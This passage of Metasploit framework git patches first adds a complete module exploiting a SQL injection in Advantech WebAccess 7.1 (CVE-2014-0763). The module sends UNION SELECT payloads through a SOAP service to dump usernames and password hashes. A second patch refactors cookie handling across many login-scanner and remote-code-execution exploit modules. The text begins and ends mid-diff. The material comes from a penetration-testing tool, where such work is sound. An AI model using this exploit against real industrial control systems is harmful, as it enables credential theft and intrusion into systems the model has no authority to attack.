"\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}" end - psexec(file_location, false, servicedescription) + psexec(file_location, false, servicedescription, servicename, displayname) print_status("Deleting \\#{filename}...") sleep(1) From a7075c7e082fc860305221e20068da90e79f6fbc Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 13 May 2014 14:17:59 -0500 Subject: [PATCH 307/853] Add module for ZDI-14-077 --- .../advantech_webaccess_dbvisitor_sqli.rb | 182 ++++++++++++++++++ 1 file changed, 182 insertions(+) create mode 100644 modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb new file mode 100644 index 0000000000..1d6617fd25 --- /dev/null +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -0,0 +1,182 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include REXML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Advantech WebAccess SQL Injection', + 'Description' => %q{ + This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The + vulnerability exists in the DBVisitor.dll component, and can be abused through malicious + requests to the ChartThemeConfig web service. This module can be used to extract the BEMS + site usernames and hashes. + }, + 'References' => + [ + [ 'CVE', '2014-0763' ], + [ 'ZDI', '14-077' ], + [ 'OSVDB', '105572' ], + [ 'BID', '66740' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03' ] + ], + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Apr 08 2014" + )) + + register_options( + [ + OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']) + ], self.class) + end + + def build_soap(injection) + xml = Document.new + xml.add_element( + "s:Envelope", + { + 'xmlns:s' => "http://schemas.xmlsoap.org/soap/envelope/" + }) + xml.root.add_element("s:Body") + body = xml.root.elements[1] + body.add_element( + "GetThemeNameList", + { + 'xmlns' => "http://tempuri.org/" + }) + name_list = body.elements[1] + name_list.add_element("userName") + name_list.elements['userName'].text = injection + + xml.to_s + end + + def do_sqli(injection, mark) + xml = build_soap(injection) + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path.to_s, "Services", "ChartThemeConfig.svc"), + 'ctype' => 'text/xml; charset=UTF-8', + 'headers' => { + 'SOAPAction' => '"http://tempuri.org/IChartThemeConfig/GetThemeNameList"' + }, + 'data' => xml + }) + + unless res and res.code == 200 and res.body.to_s =~ /#{mark}/ + return nil + end + + res.body.to_s + end + + def check + mark = Rex::Text.rand_text_alpha(8 + rand(5)) + injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " + injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" + data = do_sqli(injection, mark) + + if data.nil? + return Msf::Exploit::CheckCode::Safe + end + + Msf::Exploit::CheckCode::Vulnerable + end + + def parse_users(xml, mark) + doc = Document.new(xml) + + strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string") + strings_length = strings.length + + unless strings_length > 1 + return + end + + i = 0 + strings.each do |result| + next if result.text == mark + if i < (strings_length / 3) + @users.push(result.text) + elsif i < (strings_length / 3) * 2 + @passwords.push(result.text) + else + @passwords2.push(result.text) + end + i = i + 1 + end + + end + + def run + print_status("#{peer} - Exploiting sqli to extract users information...") + mark = Rex::Text.rand_text_alpha(8 + rand(5)) + # While installing I can only configure an Access backend, but + # according to documentation other backends are supported. This + # injection should be compatible, hopefully, with most backends. + injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " + injection << "union all select UserName from BAUser where 1=1 " + injection << "union all select Password from BAUser where 1=1 " + injection << "union all select Password2 from BAUser where 1=1 " + injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" + data = do_sqli(injection, mark) + + if data.blank? + print_error("#{peer} - Error exploiting sqli") + return + end + + @users = [] + @passwords = [] + @passwords2 = [] + + print_status("#{peer} - Parsing extracted data...") + parse_users(data, mark) + + if @users.empty? + print_error("#{peer} - Users not found") + else + print_good("#{peer} - #{@users.length} users found!") + end + + users_table = Rex::Ui::Text::Table.new( + 'Header' => 'vBulletin Users', + 'Ident' => 1, + 'Columns' => ['Username', 'Password Hash', 'Password Hash 2'] + ) + + for i in 0..@users.length - 1 + report_auth_info({ + :host => rhost, + :port => rport, + :user => @users[i], + :pass => "#{@passwords[i]}:#{@passwords2[i]}", + :type => "hash", + :sname => (ssl ? "https" : "http"), + :proof => data # Using proof to store the hash salt + }) + users_table << [@users[i], @passwords[i], @passwords2[i]] + end + + print_line(users_table.to_s) + + end + + +end + From df4b832019d88c3ab4ac8209fe5072f56df03ad0 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 13 May 2014 22:56:12 +0200 Subject: [PATCH 308/853] Resolved some more Set-Cookie warnings --- modules/auxiliary/scanner/http/dolibarr_login.rb | 4 ++-- modules/auxiliary/scanner/http/glassfish_login.rb | 4 ++-- modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb | 6 +++--- modules/auxiliary/scanner/http/owa_login.rb | 7 ++++--- modules/auxiliary/scanner/http/sentry_cdu_enum.rb | 2 +- modules/auxiliary/scanner/http/sevone_enum.rb | 2 +- .../scanner/http/smt_ipmi_url_redirect_traversal.rb | 2 +- modules/auxiliary/scanner/http/splunk_web_login.rb | 4 ++-- .../auxiliary/scanner/http/symantec_brightmail_logfile.rb | 6 +++--- modules/auxiliary/scanner/http/tomcat_enum.rb | 2 +- modules/auxiliary/scanner/http/vcms_login.rb | 2 +- modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb | 6 +++--- modules/auxiliary/scanner/lotus/lotus_domino_login.rb | 4 ++-- modules/auxiliary/scanner/msf/msf_web_login.rb | 4 ++-- .../auxiliary/scanner/vmware/vmware_screenshot_stealer.rb | 4 ++-- modules/exploits/linux/http/dolibarr_cmd_exec.rb | 4 ++-- .../linux/http/foreman_openstack_satellite_code_exec.rb | 2 +- modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb | 2 +- modules/exploits/linux/http/mutiny_frontend_upload.rb | 4 ++-- modules/exploits/linux/http/pineapp_test_li_conn_exec.rb | 2 +- modules/exploits/multi/http/activecollab_chat.rb | 2 +- modules/exploits/multi/http/axis2_deployer.rb | 4 ++-- modules/exploits/multi/http/glassfish_deployer.rb | 6 +++--- modules/exploits/multi/http/glossword_upload_exec.rb | 4 ++-- .../exploits/multi/http/hp_sitescope_uploadfileshandler.rb | 4 ++-- modules/exploits/multi/http/hp_sys_mgmt_exec.rb | 2 +- modules/exploits/multi/http/jenkins_script_console.rb | 2 +- modules/exploits/multi/http/mutiny_subnetmask_exec.rb | 2 +- modules/exploits/multi/http/php_volunteer_upload_exec.rb | 2 +- modules/exploits/multi/http/phpldapadmin_query_engine.rb | 4 ++-- modules/exploits/multi/http/qdpm_upload_exec.rb | 2 +- .../exploits/multi/http/rails_secret_deserialization.rb | 4 ++-- modules/exploits/multi/http/sflog_upload_exec.rb | 4 ++-- modules/exploits/multi/http/sit_file_upload.rb | 2 +- modules/exploits/multi/http/splunk_mappy_exec.rb | 6 +++--- modules/exploits/multi/http/splunk_upload_app_exec.rb | 4 ++-- 36 files changed, 64 insertions(+), 63 deletions(-) diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb index 6463d9af62..58ab1e19d5 100644 --- a/modules/auxiliary/scanner/http/dolibarr_login.rb +++ b/modules/auxiliary/scanner/http/dolibarr_login.rb @@ -42,10 +42,10 @@ class Metasploit3 < Msf::Auxiliary 'uri' => normalize_uri(@uri.path) }) - return [nil, nil] if not (res and res.headers['Set-Cookie']) + return [nil, nil] if res.nil? || res.get_cookies.empty? # Get the session ID from the cookie - m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/) + m = get_cookies.match(/(DOLSESSID_.+);/) id = (m.nil?) ? nil : m[1] # Get the token from the decompressed HTTP body response diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index aa2dab6a0b..7801400f3e 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -167,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Trying credential GlassFish 2.x #{user}:'#{pass}'....") res = try_login(user,pass) if res and res.code == 302 - session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i) + session = $1 if res && res.get_cookies =~ /JSESSIONID=(.*); /i res = send_request('/applications/upload.jsf', 'GET', session) p = /Deploy Enterprise Applications\/Modules/ @@ -180,7 +180,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Trying credential GlassFish 3.x #{user}:'#{pass}'....") res = try_login(user,pass) if res and res.code == 302 - session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i) + session = $1 if res && res.get_cookies =~ /JSESSIONID=(.*); /i res = send_request('/common/applications/uploadFrame.jsf', 'GET', session) p = /<title>Deploy Applications or Modules/ diff --git a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb index a55c173a17..62fe258b46 100644 --- a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb +++ b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb @@ -64,7 +64,7 @@ class Metasploit4 < Msf::Auxiliary } }) - if res and res.code == 200 and res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /([^\s]*session)=([a-z0-9]+)/ + if res && res.code == 200 && res.get_cookies =~ /([^\s]*session)=([a-z0-9]+)/ return $1,$2 else return nil @@ -134,8 +134,8 @@ class Metasploit4 < Msf::Auxiliary 'cookie' => session_cookie }) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /UserID=/ - parse_auth_cookie(res.headers['Set-Cookie']) + if res and res.code == 302 and res.get_cookies.include?('UserID=') + parse_auth_cookie(res.get_cookies) return true else return false diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index 8240a0ae11..9696f28e3f 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb @@ -200,7 +200,7 @@ class Metasploit3 < Msf::Auxiliary return :abort end - if action.name != "OWA_2013" and not res.headers['set-cookie'] + if action.name != "OWA_2013" and res.get_cookies.empty? print_error("#{msg} Received invalid repsonse due to a missing cookie (possibly due to invalid version), aborting") return :abort end @@ -233,8 +233,9 @@ class Metasploit3 < Msf::Auxiliary end else # these two lines are the authentication info - sessionid = 'sessionid=' << res.headers['set-cookie'].split('sessionid=')[1].split('; ')[0] - cadata = 'cadata=' << res.headers['set-cookie'].split('cadata=')[1].split('; ')[0] + cookies = res.get_cookies + sessionid = 'sessionid=' << cookies.split('sessionid=')[1].split('; ')[0] + cadata = 'cadata=' << cookies.split('cadata=')[1].split('; ')[0] headers['Cookie'] = 'PBack=0; ' << sessionid << '; ' << cadata end diff --git a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb index 6c00a86bfc..71de9699d7 100644 --- a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb +++ b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user,pass) }) - if (res and res.headers['Set-Cookie']) + if res and !res.get_cookies.empty? print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_hash = { diff --git a/modules/auxiliary/scanner/http/sevone_enum.rb b/modules/auxiliary/scanner/http/sevone_enum.rb index df1365d803..1714e690c9 100644 --- a/modules/auxiliary/scanner/http/sevone_enum.rb +++ b/modules/auxiliary/scanner/http/sevone_enum.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) - if (res and res.code.to_i == 200 and res.headers['Set-Cookie'].include?('SEVONE')) + if (res and res.code.to_i == 200 and res.get_cookies.include?('SEVONE')) version_key = /Version: <strong>(.+)<\/strong>/ version = res.body.scan(version_key).flatten print_good("#{rhost}:#{rport} - Application confirmed to be SevOne Network Performance Management System version #{version}") diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb index 918a44ed28..491fb9ff34 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary } }) - if res and res.code == 200 and res.body.to_s =~ /self.location="\.\.\/cgi\/url_redirect\.cgi/ and res.headers["Set-Cookie"].to_s =~ /(SID=[a-z]+)/ + if res and res.code == 200 and res.body.to_s =~ /self.location="\.\.\/cgi\/url_redirect\.cgi/ and res.get_cookies =~ /(SID=[a-z]+)/ return $1 else return nil diff --git a/modules/auxiliary/scanner/http/splunk_web_login.rb b/modules/auxiliary/scanner/http/splunk_web_login.rb index 02407661c3..1c47c9e90b 100644 --- a/modules/auxiliary/scanner/http/splunk_web_login.rb +++ b/modules/auxiliary/scanner/http/splunk_web_login.rb @@ -82,8 +82,8 @@ class Metasploit3 < Msf::Auxiliary session_id = '' cval = '' - if res and res.code == 200 and res.headers['Set-Cookie'] - res.headers['Set-Cookie'].split(';').each {|c| + if res and res.code == 200 and !res.get_cookies.empty? + res.get_cookies.split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /cval/ cval = v.split('=')[1] diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb index 7a5057147e..d3cd471a5e 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb +++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb @@ -86,8 +86,8 @@ class Metasploit3 < Msf::Auxiliary last_login = '' #A hidden field in the login page res = send_request_raw({'uri'=>'/brightmail/viewLogin.do'}) - if res and res.headers['Set-Cookie'] - sid = res.headers['Set-Cookie'].scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || '' + if res and !res.get_cookies.empty? + sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || '' end if res @@ -147,4 +147,4 @@ class Metasploit3 < Msf::Auxiliary download_file(sid, fname) end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index ab4d7484f9..e07eaecc52 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => post_data, }, 20) - if res and res.code == 200 and res.headers['Set-Cookie'] + if res and res.code == 200 and !res.get_cookies.empty? vprint_error("#{target_url} - Apache Tomcat #{user} not found ") elsif res and res.code == 200 and res.body =~ /invalid username/i vprint_error("#{target_url} - Apache Tomcat #{user} not found ") diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 21610d3ab7..f8ecb4781e 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary }) # Get the PHP session ID - m = res.headers['Set-Cookie'].match(/(PHPSESSID=.+);/) + m = res.get_cookies.match(/(PHPSESSID=.+);/) id = (m.nil?) ? nil : m[1] return id diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index 39c02bac5a..2816691fcd 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -93,10 +93,10 @@ class Metasploit3 < Msf::Auxiliary return end - if (res and res.code == 302 ) - if res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/DomAuthSessId=(.*);(.*)/i) + if res and res.code == 302 + if res.get_cookies.match(/DomAuthSessId=(.*);(.*)/i) cookie = "DomAuthSessId=#{$1}" - elsif res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/LtpaToken=(.*);(.*)/i) + elsif res.get_cookies.match(/LtpaToken=(.*);(.*)/i) cookie = "LtpaToken=#{$1}" else print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response") diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb index a9a4bcec10..3ddd187895 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb @@ -45,8 +45,8 @@ class Metasploit3 < Msf::Auxiliary 'data' => post_data, }, 20) - if (res and res.code == 302 ) - if res.headers['Set-Cookie'].match(/DomAuthSessId=(.*);(.*)/i) + if res and res.code == 302 + if res.get_cookies.match(/DomAuthSessId=(.*);(.*)/i) print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL login for '#{user}' : '#{pass}'") report_auth_info( :host => rhost, diff --git a/modules/auxiliary/scanner/msf/msf_web_login.rb b/modules/auxiliary/scanner/msf/msf_web_login.rb index 07eaecf3bf..4c67510bd9 100644 --- a/modules/auxiliary/scanner/msf/msf_web_login.rb +++ b/modules/auxiliary/scanner/msf/msf_web_login.rb @@ -76,9 +76,9 @@ class Metasploit3 < Msf::Auxiliary token = '' uisession = '' - if res and res.code == 200 and res.headers['Set-Cookie'] + if res and res.code == 200 and !res.get_cookies.empty? # extract tokens from cookie - res.headers['Set-Cookie'].split(';').each {|c| + res.get_cookies.split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /token/ token = v.split('=')[1] diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index 9c037550bd..97cbd4664c 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary 'headers' => { 'Authorization' => "Basic #{@user_pass}"} }, 25) if res - @vim_cookie = res.headers['Set-Cookie'] + @vim_cookie = res.get_cookies if res.code== 200 res.body.scan(/<a href="([\w\/\?=&;%]+)">/) do |match| link = match[0] @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary 'headers' => { 'Authorization' => "Basic #{@user_pass}"} }, 25) if res - @vim_cookie = res.headers['Set-Cookie'] + @vim_cookie = res.get_cookies if res.code == 200 img = res.body ss_path = store_loot("host.vmware.screenshot", "image/png", datastore['RHOST'], img, name , "Screenshot of VM #{name}") diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index ad798e8969..d50b15a7da 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -78,10 +78,10 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => @uri.path }) - return [nil, nil] if not (res and res.headers['Set-Cookie']) + return [nil, nil] if res.nil? || res.get_cookies.empty? # Get the session ID from the cookie - m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/) + m = res.get_cookies.match(/(DOLSESSID_.+);/) id = (m.nil?) ? nil : m[1] # Get the token from the decompressed HTTP body response diff --git a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb index bc02f5d255..184ea9c2e6 100644 --- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb +++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb @@ -67,7 +67,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.headers['Location'] =~ /users\/login$/ fail_with(Failure::NoAccess, 'Authentication failed') else - session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/ + session = $1 if res.get_cookies =~ /_session_id=([0-9a-f]*)/ fail_with(Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil? end diff --git a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb index 676e931b3d..cbc3fc3043 100644 --- a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb +++ b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote 'josso_password' => datastore['PASSWORD'] } }) - if res and res.headers['Set-Cookie'] =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/ + if res and res.get_cookies =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/ return $1 else return nil diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index 03d03adf5f..e0fa99ef5e 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET' }) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/ + if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=(.*);/ first_session = $1 end @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => "JSESSIONID=#{first_session}" }) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/ + if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=(.*);/ @session = $1 return true end diff --git a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb index accf593b61..e7a568baf2 100644 --- a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb +++ b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote 'iptest' => "127.0.0.1" # In order to make things as fast as possible } }) - if res and res.code == 200 and res.headers.include?('Set-Cookie') and res.headers['Set-Cookie'] =~ /SESSIONID/ + if res and res.code == 200 and res.get_cookies.include?('SESSIONID') return res.get_cookies else return nil diff --git a/modules/exploits/multi/http/activecollab_chat.rb b/modules/exploits/multi/http/activecollab_chat.rb index d926fafdce..7a6bf553b4 100644 --- a/modules/exploits/multi/http/activecollab_chat.rb +++ b/modules/exploits/multi/http/activecollab_chat.rb @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote # response handling if res and res.code == 302 - if (res.headers['Set-Cookie'] =~ /ac_ActiveCollab_sid_eaM4h3LTIZ=(.*); expires=/) + if res.get_cookies =~ /ac_ActiveCollab_sid_[a-zA-Z0-9]+=(.*); expires=/ acsession = $1 end elsif res and res.body =~ /Failed to log you in/ diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index acf1734552..dfe58bb7d6 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -283,7 +283,7 @@ class Metasploit3 < Msf::Exploit::Remote # likely to change success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1) - if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/) + if res.get_cookies =~ /JSESSIONID=(.*);/ session = $1 end end @@ -319,7 +319,7 @@ class Metasploit3 < Msf::Exploit::Remote # likely to change success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1) - if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/) + if res.get_cookies =~ /JSESSIONID=(.*);/ session = $1 end end diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index 7115369187..042f17ccd2 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -684,7 +684,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying #{type} credentials for GlassFish 2.x #{user}:'#{pass}'....") res = try_login(user,pass) if res and res.code == 302 - session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i) + session = $1 if res and res.get_cookies =~ /JSESSIONID=(.*); /i res = send_request('/applications/upload.jsf', 'GET', session) p = /<title>Deploy Enterprise Applications\/Modules/ @@ -697,7 +697,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying #{type} credentials for GlassFish 3.x #{user}:'#{pass}'....") res = try_login(user,pass) if res and res.code == 302 - session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i) + session = $1 if res and res.get_cookies =~ /JSESSIONID=(.*); /i res = send_request('/common/applications/uploadFrame.jsf', 'GET', session) p = /<title>Deploy Applications or Modules/ @@ -788,7 +788,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Glassfish edition: #{banner}") #Get session - res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); / + res.get_cookies =~ /JSESSIONID=(.*); / session = $1 #Set HTTP verbs. lower-case is used to bypass auth on v3.0 diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index 56c54d1008..aec23ca800 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res.code == 200 vprint_error("#{peer} - Authentication failed") return Exploit::CheckCode::Unknown - elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ + elsif res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ vprint_good("#{peer} - Authenticated successfully") return Exploit::CheckCode::Appears end @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote # login; get session id and token print_status("#{peer} - Authenticating as user '#{user}'") res = login(base, user, pass) - if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ + if res and res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ token = "#{$1}" sid = "#{$2}" print_good("#{peer} - Authenticated successfully") diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index 825701d651..90b9a989e2 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST' ) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/ + if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=([0-9A-F]*);/ session_id = $1 else print_error("#{peer} - Retrieve of initial JSESSIONID failed") @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/ + if res and res.code == 302 and res.get_cookies =~ /JSESSIONID=([0-9A-F]*);/ session_id = $1 redirect = URI(res.headers['Location']).path else diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb index 581fbce608..dabfe034c6 100644 --- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote # CpqElm-Login: success if res.headers['CpqElm-Login'].to_s =~ /success/ - cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || '' + cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || '' end cookie diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index 3c7bf20530..73e8d7adee 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/ fail_with(Failure::NoAccess, 'login failed') end - sessionid = 'JSESSIONID' << res.headers['set-cookie'].split('JSESSIONID')[1].split('; ')[0] + sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0] @cookie = "#{sessionid}" else print_status('No authentication required, skipping login...') diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb index d4cadae1c7..900c5a6418 100644 --- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb +++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb @@ -193,7 +193,7 @@ 